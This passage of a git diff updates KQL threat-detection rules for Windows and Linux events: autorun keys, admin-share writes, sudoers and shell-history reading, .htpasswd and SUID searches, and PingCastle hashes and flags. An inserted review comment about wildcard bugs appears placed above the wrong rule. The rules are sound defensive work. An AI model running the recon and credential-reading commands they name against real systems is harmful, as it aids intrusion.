startswith "C:\\Windows\\Temp\\")) or (RegistryValueData endswith "}\\VC_redist.x64.exe\" /burn.runonce" and InitiatingProcessFolderPath endswith "\\VC_redist.x64.exe")))) and (not(((RegistryValueData endswith "instup.exe\" /instop:repair /wait" and InitiatingProcessFolderPath endswith "\\instup.exe" and RegistryKey endswith "\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\AvRepair") or ((RegistryValueData in~ ("{472083B1-C522-11CF-8763-00608CC02F24}", "{472083B0-C522-11CF-8763-00608CC02F24}")) and InitiatingProcessFolderPath endswith "\\instup.exe" and (RegistryKey endswith "\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ShellIconOverlayIdentifiers\\00avg\\(Default)" or RegistryKey endswith "\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ShellIconOverlayIdentifiers\\00asw\\(Default)")) or (RegistryValueData endswith "\\Avira.OE.Setup.Bundle.exe\" /burn.runonce" and InitiatingProcessFolderPath endswith "\\Avira.OE.Setup.Bundle.exe") or (RegistryValueData endswith "Discord.exe --checkInstall" and RegistryKey endswith "\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\Discord") or (RegistryValueData endswith ".exe\" /burn.runonce" and RegistryValueData startswith "\"C:\\ProgramData\\Package Cache\\" and InitiatingProcessFolderPath contains "\\windowsdesktop-runtime-" and (RegistryKey endswith "\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\{e2d1ae32-dd1d-4ad7-a298-10e42e7840fc}" or RegistryKey endswith "\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\{7037b699-7382-448c-89a7-4765961d2537}")) or (RegistryValueData endswith "-A251-47B7-93E1-CDD82E34AF8B}" or RegistryValueData =~ "grpconv -o" or (RegistryValueData contains "C:\\Program Files" and RegistryValueData contains "\\Dropbox\\Client\\Dropbox.exe" and RegistryValueData contains " /systemstartup")) or RegistryKey endswith "\\Explorer\\Browser Helper 
Objects\\{92EF2EAD-A7CE-4424-B0DB-499CF856608E}\\NoExplorer" or (InitiatingProcessFolderPath =~ "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeClickToRun.exe" and RegistryKey endswith "\\Office\\ClickToRun\\REGISTRY\\MACHINE\\Software\\Wow6432Node*") or ((InitiatingProcessFolderPath in~ ("C:\\Program Files\\Microsoft Office\\root\\integration\\integrator.exe", "C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe")) and RegistryKey endswith "\\Explorer\\Browser Helper Objects\\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}*") or (InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Updates\\")))))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/wow6432node_windows_nt_currentversion_autorun_keys_modification.kql b/KQL/rules/Privilege Escalation/wow6432node_windows_nt_currentversion_autorun_keys_modification.kql
index b85affc9..6472a03f 100644
--- a/KQL/rules/Privilege Escalation/wow6432node_windows_nt_currentversion_autorun_keys_modification.kql
+++ b/KQL/rules/Privilege Escalation/wow6432node_windows_nt_currentversion_autorun_keys_modification.kql
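Review bot: Five selection terms in this rule's `| where` clause carry a literal asterisk — `RegistryKey endswith "\\Run*"`, `"\\RunOnce*"`, `"\\RunOnceEx*"`, `"\\RunServices*"`, `"\\RunServicesOnce*"` — but KQL `endswith` is a plain suffix comparison with no wildcard semantics, so each of them only matches a key whose name literally ends in `Run*`, and the Run/RunOnce/RunServices keys this rule is named for are never detected. The same pattern appears in the exclusion block (`...CurrentVersion\\Run*`, `...Software\\Wow6432Node*`, `...{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}*`), where it has the opposite effect: those msiexec and Office filters never match, so the suppressions they were meant to provide are lost. The trailing `*` reads like a source-rule wildcard emitted verbatim; if these files are produced by the conversion script, the fix belongs there rather than in this file — a trailing wildcard on an `endswith` value should be emitted as a `contains` on the value without the `*`, e.g. `RegistryKey contains "\\CurrentVersion\\Run"` here. It is worth grepping the other regenerated rules for `*"` inside `endswith` and `=~` values, since any occurrence is a silent detection gap.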
@@ -1,13 +1,13 @@
-// Title: Wow6432Node Windows NT CurrentVersion Autorun Keys Modification
-// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
-// Date: 2019-10-25
-// Level: medium
-// Description: Detects modification of autostart extensibility point (ASEP) in registry.
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
-// False Positives:
-// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason
-// - Legitimate administrator sets up autorun keys for legitimate reason
-
-DeviceRegistryEvents
+// Title: Wow6432Node Windows NT CurrentVersion Autorun Keys Modification
+// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
+// Date: 2019-10-25
+// Level: medium
+// Description: Detects modification of autostart extensibility point (ASEP) in registry.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
+// False Positives:
+// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason
+// - Legitimate administrator sets up autorun keys for legitimate reason
+
+DeviceRegistryEvents
 | where ((RegistryKey contains "\\Windows\\Appinit_Dlls" or RegistryKey contains "\\Image File Execution Options" or RegistryKey contains "\\Drivers32") and RegistryKey contains "\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion") and (not((RegistryValueData =~ "(Empty)" or RegistryValueData endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options" or isnull(RegistryValueData))))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/writing_local_admin_share.kql b/KQL/rules/Privilege Escalation/writing_local_admin_share.kql
index 19f273fa..4489d5f9 100644
--- a/KQL/rules/Privilege Escalation/writing_local_admin_share.kql
+++ b/KQL/rules/Privilege Escalation/writing_local_admin_share.kql
@@ -1,11 +1,11 @@
-// Title: Writing Local Admin Share
-// Author: frack113
-// Date: 2022-01-01
-// Level: medium
-// Description: Aversaries may use to interact with a remote network share using Server Message Block (SMB).
-// This technique is used by post-exploitation frameworks.
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.lateral-movement, attack.t1546.002
-
-DeviceFileEvents
+// Title: Writing Local Admin Share
+// Author: frack113
+// Date: 2022-01-01
+// Level: medium
+// Description: Aversaries may use to interact with a remote network share using Server Message Block (SMB).
+// This technique is used by post-exploitation frameworks.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.lateral-movement, attack.t1546.002
+
+DeviceFileEvents
 | where FolderPath contains "\\\\127.0.0" and FolderPath contains "\\ADMIN$\\"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/xwizard_exe_execution_from_non_default_location.kql b/KQL/rules/Privilege Escalation/xwizard_exe_execution_from_non_default_location.kql
index 215c87d7..f68ca9a2 100644
--- a/KQL/rules/Privilege Escalation/xwizard_exe_execution_from_non_default_location.kql
+++ b/KQL/rules/Privilege Escalation/xwizard_exe_execution_from_non_default_location.kql
@@ -1,13 +1,13 @@
-// Title: Xwizard.EXE Execution From Non-Default Location
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021-09-20
-// Level: high
-// Description: Detects the execution of Xwizard tool from a non-default directory.
-// When executed from a non-default directory, this utility can be abused in order to side load a custom version of "xwizards.dll".
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001
-// False Positives:
-// - Windows installed on non-C drive
-
-DeviceProcessEvents
+// Title: Xwizard.EXE Execution From Non-Default Location
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-09-20
+// Level: high
+// Description: Detects the execution of Xwizard tool from a non-default directory.
+// When executed from a non-default directory, this utility can be abused in order to side load a custom version of "xwizards.dll".
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001
+// False Positives:
+// - Windows installed on non-C drive
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\xwizard.exe" or ProcessVersionInfoOriginalFileName =~ "xwizard.exe") and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\")))
\ No newline at end of file
diff --git a/KQL/rules/Reconnaissance/access_of_sudoers_file_content.kql b/KQL/rules/Reconnaissance/access_of_sudoers_file_content.kql
index f0903e1c..c8a07206 100644
--- a/KQL/rules/Reconnaissance/access_of_sudoers_file_content.kql
+++ b/KQL/rules/Reconnaissance/access_of_sudoers_file_content.kql
@@ -1,12 +1,12 @@
-// Title: Access of Sudoers File Content
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-06-20
-// Level: medium
-// Description: Detects the execution of a text-based file access or inspection utilities to read the content of /etc/sudoers in order to potentially list all users that have sudo rights.
-// MITRE Tactic: Reconnaissance
-// Tags: attack.reconnaissance, attack.t1592.004
-// False Positives:
-// - Legitimate administration activities
-
-DeviceProcessEvents
+// Title: Access of Sudoers File Content
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-06-20
+// Level: medium
+// Description: Detects the execution of a text-based file access or inspection utilities to read the content of /etc/sudoers in order to potentially list all users that have sudo rights.
+// MITRE Tactic: Reconnaissance
+// Tags: attack.reconnaissance, attack.t1592.004
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
 | where ProcessCommandLine contains " /etc/sudoers" and (FolderPath endswith "/cat" or FolderPath endswith "/ed" or FolderPath endswith "/egrep" or FolderPath endswith "/emacs" or FolderPath endswith "/fgrep" or FolderPath endswith "/grep" or FolderPath endswith "/head" or FolderPath endswith "/less" or FolderPath endswith "/more" or FolderPath endswith "/nano" or FolderPath endswith "/tail")
\ No newline at end of file
diff --git a/KQL/rules/Reconnaissance/linux_recon_indicators.kql b/KQL/rules/Reconnaissance/linux_recon_indicators.kql
index 2609368d..9be5ce4f 100644
--- a/KQL/rules/Reconnaissance/linux_recon_indicators.kql
+++ b/KQL/rules/Reconnaissance/linux_recon_indicators.kql
@@ -1,12 +1,12 @@
-// Title: Linux Recon Indicators
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-06-20
-// Level: high
-// Description: Detects events with patterns found in commands used for reconnaissance on linux systems
-// MITRE Tactic: Reconnaissance
-// Tags: attack.reconnaissance, attack.t1592.004, attack.credential-access, attack.t1552.001
-// False Positives:
-// - Legitimate administration activities
-
-DeviceProcessEvents
+// Title: Linux Recon Indicators
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-06-20
+// Level: high
+// Description: Detects events with patterns found in commands used for reconnaissance on linux systems
+// MITRE Tactic: Reconnaissance
+// Tags: attack.reconnaissance, attack.t1592.004, attack.credential-access, attack.t1552.001
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
 | where ProcessCommandLine contains " -name .htpasswd" or ProcessCommandLine contains " -perm -4000 "
\ No newline at end of file
diff --git a/KQL/rules/Reconnaissance/potential_active_directory_enumeration_using_ad_module_proccreation.kql b/KQL/rules/Reconnaissance/potential_active_directory_enumeration_using_ad_module_proccreation.kql
index c692837f..f349e4b1 100644
--- a/KQL/rules/Reconnaissance/potential_active_directory_enumeration_using_ad_module_proccreation.kql
+++ b/KQL/rules/Reconnaissance/potential_active_directory_enumeration_using_ad_module_proccreation.kql
@@ -1,12 +1,12 @@
-// Title: Potential Active Directory Enumeration Using AD Module - ProcCreation
-// Author: frack113
-// Date: 2023-01-22
-// Level: medium
-// Description: Detects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dl" DLL. Which is often used by attackers to perform AD enumeration.
-// MITRE Tactic: Reconnaissance
-// Tags: attack.reconnaissance, attack.discovery, attack.impact
-// False Positives:
-// - Legitimate use of the library for administrative activity
-
-DeviceProcessEvents
+// Title: Potential Active Directory Enumeration Using AD Module - ProcCreation
+// Author: frack113
+// Date: 2023-01-22
+// Level: medium
+// Description: Detects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dl" DLL. Which is often used by attackers to perform AD enumeration.
+// MITRE Tactic: Reconnaissance
+// Tags: attack.reconnaissance, attack.discovery, attack.impact
+// False Positives:
+// - Legitimate use of the library for administrative activity
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "Import-Module " or ProcessCommandLine contains "ipmo ") and ProcessCommandLine contains "Microsoft.ActiveDirectory.Management.dll" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/KQL/rules/Reconnaissance/print_history_file_contents.kql b/KQL/rules/Reconnaissance/print_history_file_contents.kql
index 2b58e02d..7e7fdd46 100644
--- a/KQL/rules/Reconnaissance/print_history_file_contents.kql
+++ b/KQL/rules/Reconnaissance/print_history_file_contents.kql
@@ -1,12 +1,12 @@
-// Title: Print History File Contents
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-06-20
-// Level: medium
-// Description: Detects events in which someone prints the contents of history files to the commandline or redirects it to a file for reconnaissance
-// MITRE Tactic: Reconnaissance
-// Tags: attack.reconnaissance, attack.t1592.004
-// False Positives:
-// - Legitimate administration activities
-
-DeviceProcessEvents
+// Title: Print History File Contents
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-06-20
+// Level: medium
+// Description: Detects events in which someone prints the contents of history files to the commandline or redirects it to a file for reconnaissance
+// MITRE Tactic: Reconnaissance
+// Tags: attack.reconnaissance, attack.t1592.004
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
 | where (FolderPath endswith "/cat" or FolderPath endswith "/head" or FolderPath endswith "/tail" or FolderPath endswith "/more") and ((ProcessCommandLine contains "/.bash_history" or ProcessCommandLine contains "/.zsh_history") or (ProcessCommandLine endswith "_history" or ProcessCommandLine endswith ".history" or ProcessCommandLine endswith "zhistory"))
\ No newline at end of file
diff --git a/KQL/rules/Reconnaissance/pua_pingcastle_execution.kql b/KQL/rules/Reconnaissance/pua_pingcastle_execution.kql
index 5a938f7f..5f6dcfbb 100644
--- a/KQL/rules/Reconnaissance/pua_pingcastle_execution.kql
+++ b/KQL/rules/Reconnaissance/pua_pingcastle_execution.kql
@@ -1,10 +1,10 @@ -// Title: PUA - PingCastle Execution -// Author: Nasreddine Bencherchali (Nextron Systems), frack113 -// Date: 2024-01-11 -// Level: medium -// Description: Detects the execution of PingCastle, a tool designed to quickly assess the Active Directory security level. -// MITRE Tactic: Reconnaissance -// Tags: attack.reconnaissance, attack.t1595 - -DeviceProcessEvents +// Title: PUA - PingCastle Execution +// Author: Nasreddine Bencherchali (Nextron Systems), frack113 +// Date: 2024-01-11 +// Level: medium +// Description: Detects the execution of PingCastle, a tool designed to quickly assess the Active Directory security level. +// MITRE Tactic: Reconnaissance +// Tags: attack.reconnaissance, attack.t1595 + +DeviceProcessEvents | where ((MD5 startswith "f741f25ac909ee434e50812d436c73ff" or MD5 startswith "d40acbfc29ee24388262e3d8be16f622" or MD5 startswith "01bb2c16fadb992fa66228cd02d45c60" or MD5 startswith "9e1b18e62e42b5444fc55b51e640355b" or MD5 startswith "b7f8fe33ac471b074ca9e630ba0c7e79" or MD5 startswith "324579d717c9b9b8e71d0269d13f811f" or MD5 startswith "63257a1ddaf83cfa43fe24a3bc06c207" or MD5 startswith "049e85963826b059c9bac273bb9c82ab" or MD5 startswith "ecb98b7b4d4427eb8221381154ff4cb2" or MD5 startswith "faf87749ac790ec3a10dd069d10f9d63" or MD5 startswith "f296dba5d21ad18e6990b1992aea8f83" or MD5 startswith "93ba94355e794b6c6f98204cf39f7a11" or MD5 startswith "a258ef593ac63155523a461ecc73bdba" or MD5 startswith "97000eb5d1653f1140ee3f47186463c4" or MD5 startswith "95eb317fbbe14a82bd9fdf31c48b8d93" or MD5 startswith "32fe9f0d2630ac40ea29023920f20f49" or MD5 startswith "a05930dde939cfd02677fc18bb2b7df5" or MD5 startswith "124283924e86933ff9054a549d3a268b" or MD5 startswith "ceda6909b8573fdeb0351c6920225686" or MD5 startswith "60ce120040f2cd311c810ae6f6bbc182" or MD5 startswith "2f10cdc5b09100a260703a28eadd0ceb" or MD5 startswith "011d967028e797a4c16d547f7ba1463f" or MD5 startswith "2da9152c0970500c697c1c9b4a9e0360" or MD5 startswith 
"b5ba72034b8f44d431f55275bace9f8b" or MD5 startswith "d6ed9101df0f24e27ff92ddab42dacca" or MD5 startswith "3ed3cdb6d12aa1ac562ad185cdbf2d1d" or MD5 startswith "5e083cd0143ae95a6cb79b68c07ca573" or MD5 startswith "28caff93748cb84be70486e79f04c2df" or MD5 startswith "9d4f12c30f9b500f896efd1800e4dd11" or MD5 startswith "4586f7dd14271ad65a5fb696b393f4c0" or MD5 startswith "86ba9dddbdf49215145b5bcd081d4011" or MD5 startswith "9dce0a481343874ef9a36c9a825ef991" or MD5 startswith "85890f62e231ad964b1fda7a674747ec" or MD5 startswith "599be548da6441d7fe3e9a1bb8cb0833" or MD5 startswith "9b0c7fd5763f66e9b8c7b457fce53f96" or MD5 startswith "32d45718164205aec3e98e0223717d1d" or MD5 startswith "6ff5f373ee7f794cd17db50704d00ddb" or MD5 startswith "88efbdf41f0650f8f58a3053b0ca0459" or MD5 startswith "ef915f61f861d1fb7cbde9afd2e7bd93" or MD5 startswith "781fa16511a595757154b4304d2dd350" or MD5 startswith "5018ec39be0e296f4fc8c8575bfa8486" or MD5 startswith "f4a84d6f1caf0875b50135423d04139f") or (SHA1 startswith "9c1431801fa6342ed68f047842b9a11778fc669b" or SHA1 startswith "c36c862f40dad78cb065197aad15fef690c262f2" or SHA1 startswith "bc8e23faea8b3c537f268b3e81d05b937012272d" or SHA1 startswith "12e0357658614ff60d480d1a6709be68a2e40c5f" or SHA1 startswith "18b33ab5719966393d424a3edbfa8dec225d98fa" or SHA1 startswith "f14c9633040897d375e3069fddc71e859f283778" or SHA1 startswith "08041b426c9f112ad2061bf3c8c718e34739d4fc" or SHA1 startswith "7be77c885d0c9a4af4cecc64d512987cf93ba937" or SHA1 startswith "72dbb719b05f89d9d2dbdf186714caf7639daa36" or SHA1 startswith "5b1498beb2cfb4d971e377801e7abce62c0e315b" or SHA1 startswith "292629c6ab33bddf123d26328025e2d157d9e8fc" or SHA1 startswith "be59e621e83a2d4c87b0e6c69a2d22f175408b11" or SHA1 startswith "0250ce9a716ab8cca1c70a9de4cbc49a51934995" or SHA1 startswith "607e1fa810c799735221a609af3bfc405728c02d" or SHA1 startswith "ab1c547f6d1c07a9e0a01e46adea3aae1cac12e3" or SHA1 startswith "044cf5698a8e6b0aeba5acb56567f06366a9a70a" or SHA1 
startswith "ef2dea8c736d49607832986c6c2d6fdd68ba6491" or SHA1 startswith "efffc2bfb8af2e3242233db9a7109b903fc3f178" or SHA1 startswith "5a05d4320de9afbc84de8469dd02b3a109efb2d4" or SHA1 startswith "a785d88cf8b862a420b9be793ee6a9616aa94c84" or SHA1 startswith "5688d56cbaf0d934c4e37b112ba257e8fb63f4ea" or SHA1 startswith "5cd2ada1c26815fbfd6a0cd746d5d429c0d83a17" or SHA1 startswith "81d67b3d70c4e855cb11a453cc32997517708362" or SHA1 startswith "9cffce9de95e0109f4dfecce0ab2cb0a59cc58ad" or SHA1 startswith "09c6930d057f49c1c1e11cf9241fffc8c12df3a2" or SHA1 startswith "e27bf7db8d96db9d4c8a06ee5e9b8e9fcb86ac92" or SHA1 startswith "9e3c992415e390f9ada4d15c693b687f38a492d1" or SHA1 startswith "3f34a5ee303d37916584c888c4928e1c1164f92a" or SHA1 startswith "ea4c8c56a8f5c90a4c08366933e5fb2de611d0db" or SHA1 startswith "3150f14508ee4cae19cf09083499d1cda8426540" or SHA1 startswith "036ad9876fa552b1298c040e233d620ea44689c6" or SHA1 startswith "3a3c1dcb146bb4616904157344ce1a82cd173bf5" or SHA1 startswith "6230d6fca973fa26188dfbadede57afb4c15f75c" or SHA1 startswith "8f7b2a9b8842f339b1e33602b7f926ab65de1a4d" or SHA1 startswith "a586bb06b59a4736a47abff8423a54fe8e2c05c4" or SHA1 startswith "c82152cddf9e5df49094686531872ecd545976db" or SHA1 startswith "04c39ffc18533100aaa4f9c06baf2c719ac94a61" or SHA1 startswith "e082affa5cdb2d46452c6601a9e85acb8446b836" or SHA1 startswith "a075bfb6cf5c6451ce682197a87277c8bc188719" or SHA1 startswith "34c0c5839af1c92bce7562b91418443a2044c90d" or SHA1 startswith "74e10a9989e0ec8fe075537ac802bd3031ae7e08" or SHA1 startswith "3a515551814775df0ccbe09f219bc972eae45a10") or (SHA256 startswith "90fd5b855b5107e7abaaefb6e658f50d5d6e08ac28e35f31d8b03dcabf77872b" or SHA256 startswith "5836c24f233f77342fee825f3cad73caab7ab4fb65ec2aec309fd12bc1317e85" or SHA256 startswith "e850e54b12331249c357a20604281b9abf8a91e6f3d957463fc625e6b126ef03" or SHA256 startswith "9e752f29edcd0db9931c20b173eee8d4d8196f87382c68a6e7eb4c8a44d58795" or SHA256 startswith 
"7a8c127d6c41f80d178d2315ed2f751ac91b1cd54d008af13680e04f068f426f" or SHA256 startswith "9f65e1c142c4f814e056a197a2241fd09e09acf245c62897109871137321a72a" or SHA256 startswith "c9b52d03c66d54d6391c643b3559184b1425c84a372081ec2bfed07ebf6af275" or SHA256 startswith "1b96f6218498aa6baf6f6c15b8f99e542077e33feb1ab5472bbbf7d4de43eb6b" or SHA256 startswith "768021fc242054decc280675750dec0a9e74e764b8646864c58756fa2386d2a2" or SHA256 startswith "1e1b32bef31be040f0f038fcb5a2d68fb192daaef23c6167f91793d21e06ebae" or SHA256 startswith "606bd75ed9d2d6107ea7ee67063d1761a99f2fb5e932c8344d11395d24587dd6" or SHA256 startswith "b489d3cdd158f040322ae5c8d0139ad28eff743c738a10f2d0255c7e149bd92a" or SHA256 startswith "ca7ecf04a8ad63aff330492c15270d56760cb223a607cdb1431fb00e1b9985d1" or SHA256 startswith "9dc4fca72463078b70f6516559a179c78400b06534e63ee12fb38adbe2632559" or SHA256 startswith "c00d2aee59bac087d769e09b5b7f832176f7714fefdc6af2502e6031e3eb37c2" or SHA256 startswith "a8e96d564687064190eaf865774f773def05fdbf651aa5bbf66216c077b863ef" or SHA256 startswith "84ed328cee2a0505e87662faf6fc57915e3a831c97ee88ad691f5c63522e139d" or SHA256 startswith "c143de99c57965d3a44c1fce6a97c2773b050609c1ea7f45688a4ca2422a5524" or SHA256 startswith "01d1efd5e552c59baa70c0778902233c05fde7de6e5cc156c62607df0804d36b" or SHA256 startswith "9a8dfeb7e3174f3510691e2b32d0f9088e0ed67d9ed1b2afbe450d70dec2016b" or SHA256 startswith "63b92a114075d855f706979d50ed3460fe39f8a2f5498b7657f0d14865117629" or SHA256 startswith "2eb014130ff837b6481c26f0d0152f84de22ca7370b15a4f51921e0054a2a358" or SHA256 startswith "7d5bb4271bf8ca2b63a59e731f3ec831dbda53adb8e28665e956afb4941f32ca" or SHA256 startswith "e57098a75bf32e127c214b61bfba492d6b209e211f065fcc84ff10637a2143ea" or SHA256 startswith "dd14dbcdbcfcf4bc108a926b9667af4944a3b6faf808cf1bb9a3a2554722e172" or SHA256 startswith "dca2b1b824cb28bd15577eace45bde7ff8f8f44705b17085524659de31761de4" or SHA256 startswith 
"8b95f339a07d59a8c8d8580283dffb9e8dfabdeb9171e42c948ab68c71afe7f2" or SHA256 startswith "5428a840fab6ac4a0ecb2fc20dbc5f928432b00b9297dd1cb6e69336f44eba66" or SHA256 startswith "e2517ae0fccaa4aefe039026a4fc855964f0c2a5f84177140200b0e58ddbfd27" or SHA256 startswith "75d05880de2593480254181215dd9a0075373876f2f4a2a4a9a654b2e0729a41" or SHA256 startswith "56490e14ce3817c3a1ddc0d97b96e90d6351bcd29914e7c9282f6a998cca84b1" or SHA256 startswith "f25d0a5e77e4ed9e7c4204a33cfc8e46281b43adbee550b15701dd00f41bdbe0" or SHA256 startswith "845a5fdcbb08e7efa7e0eabfcd881c9eebc0eec0a3a2f8689194e6b91b6eeaf8" or SHA256 startswith "9a89e6652e563d26a3f328ba23d91f464c9549da734557c5a02559df24b2700d" or SHA256 startswith "5614f2bc9b2ed414aab2c5c7997bdcbe8236e67ced8f91a63d1b6cfbe6e08726" or SHA256 startswith "37bf92dcedb47a90d8d38ebda8d8dd168ef5803dcb01161f8cf6d68b70d49d90" or SHA256 startswith "ec8590f91f5cc21e931c57345425f0625a6e37dfba026b222260450de40459f5" or SHA256 startswith "3994eb72b1c227c593e14b8cad7001de11d1c247d4fbf84d0714bb8a17853140" or SHA256 startswith "d654f870436d63c9d8e4390d9d4d898abdf0456736c7654d71cdf81a299c3f87" or SHA256 startswith "63fbfabd4d8afb497dee47d112eb9d683671b75a8bf6407c4bd5027fd211b892" or SHA256 startswith "47028053f05188e6a366fff19bedbcad2bc4daba8ff9e4df724b77d0181b7054" or SHA256 startswith "7c1b1e8c880a30c43b3a52ee245f963a977e1f40284f4b83f4b9afe3821753dd")) or FolderPath endswith "\\PingCastle.exe" or ProcessVersionInfoOriginalFileName =~ "PingCastle.exe" or ProcessVersionInfoProductName =~ "Ping Castle" or (ProcessCommandLine contains "--scanner aclcheck" or ProcessCommandLine contains "--scanner antivirus" or ProcessCommandLine contains "--scanner computerversion" or ProcessCommandLine contains "--scanner foreignusers" or ProcessCommandLine contains "--scanner laps_bitlocker" or ProcessCommandLine contains "--scanner localadmin" or ProcessCommandLine contains "--scanner nullsession" or ProcessCommandLine contains "--scanner nullsession-trust" or 
ProcessCommandLine contains "--scanner oxidbindings" or ProcessCommandLine contains "--scanner remote" or ProcessCommandLine contains "--scanner share" or ProcessCommandLine contains "--scanner smb" or ProcessCommandLine contains "--scanner smb3querynetwork" or ProcessCommandLine contains "--scanner spooler" or ProcessCommandLine contains "--scanner startup" or ProcessCommandLine contains "--scanner zerologon") or ProcessCommandLine contains "--no-enum-limit" or (ProcessCommandLine contains "--healthcheck" and ProcessCommandLine contains "--level Full") or (ProcessCommandLine contains "--healthcheck" and ProcessCommandLine contains "--server ")
\ No newline at end of file
diff --git a/KQL/rules/Reconnaissance/pua_pingcastle_execution_from_potentially_suspicious_parent.kql b/KQL/rules/Reconnaissance/pua_pingcastle_execution_from_potentially_suspicious_parent.kql
index 26f09524..5debb7c9 100644
--- a/KQL/rules/Reconnaissance/pua_pingcastle_execution_from_potentially_suspicious_parent.kql
+++ b/KQL/rules/Reconnaissance/pua_pingcastle_execution_from_potentially_suspicious_parent.kql
@@ -1,10 +1,10 @@ -// Title: PUA - PingCastle Execution From Potentially Suspicious Parent -// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems) -// Date: 2024-01-11 -// Level: high -// Description: Detects the execution of PingCastle, a tool designed to quickly assess the Active Directory security level via a script located in a potentially suspicious or uncommon location. -// MITRE Tactic: Reconnaissance -// Tags: attack.reconnaissance, attack.t1595 - -DeviceProcessEvents +// Title: PUA - PingCastle Execution From Potentially Suspicious Parent +// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems) +// Date: 2024-01-11 +// Level: high +// Description: Detects the execution of PingCastle, a tool designed to quickly assess the Active Directory security level via a script located in a potentially suspicious or uncommon location. +// MITRE Tactic: Reconnaissance +// Tags: attack.reconnaissance, attack.t1595 + +DeviceProcessEvents | where ((InitiatingProcessCommandLine contains ".bat" or InitiatingProcessCommandLine contains ".chm" or InitiatingProcessCommandLine contains ".cmd" or InitiatingProcessCommandLine contains ".hta" or InitiatingProcessCommandLine contains ".htm" or InitiatingProcessCommandLine contains ".html" or InitiatingProcessCommandLine contains ".js" or InitiatingProcessCommandLine contains ".lnk" or InitiatingProcessCommandLine contains ".ps1" or InitiatingProcessCommandLine contains ".vbe" or InitiatingProcessCommandLine contains ".vbs" or InitiatingProcessCommandLine contains ".wsf") or (InitiatingProcessCommandLine contains ":\\Perflogs\\" or InitiatingProcessCommandLine contains ":\\Temp\\" or InitiatingProcessCommandLine contains ":\\Users\\Public\\" or InitiatingProcessCommandLine contains ":\\Windows\\Temp\\" or InitiatingProcessCommandLine contains "\\AppData\\Local\\Temp" or InitiatingProcessCommandLine contains "\\AppData\\Roaming\\" or InitiatingProcessCommandLine contains 
"\\Temporary Internet") or ((InitiatingProcessCommandLine contains ":\\Users\\" and InitiatingProcessCommandLine contains "\\Favorites\\") or (InitiatingProcessCommandLine contains ":\\Users\\" and InitiatingProcessCommandLine contains "\\Favourites\\") or (InitiatingProcessCommandLine contains ":\\Users\\" and InitiatingProcessCommandLine contains "\\Contacts\\"))) and (InitiatingProcessCommandLine contains ".bat" or InitiatingProcessCommandLine contains ".chm" or InitiatingProcessCommandLine contains ".cmd" or InitiatingProcessCommandLine contains ".hta" or InitiatingProcessCommandLine contains ".htm" or InitiatingProcessCommandLine contains ".html" or InitiatingProcessCommandLine contains ".js" or InitiatingProcessCommandLine contains ".lnk" or InitiatingProcessCommandLine contains ".ps1" or InitiatingProcessCommandLine contains ".vbe" or InitiatingProcessCommandLine contains ".vbs" or InitiatingProcessCommandLine contains ".wsf") and (FolderPath endswith "\\PingCastle.exe" or ProcessVersionInfoOriginalFileName =~ "PingCastle.exe" or ProcessVersionInfoProductName =~ "Ping Castle" 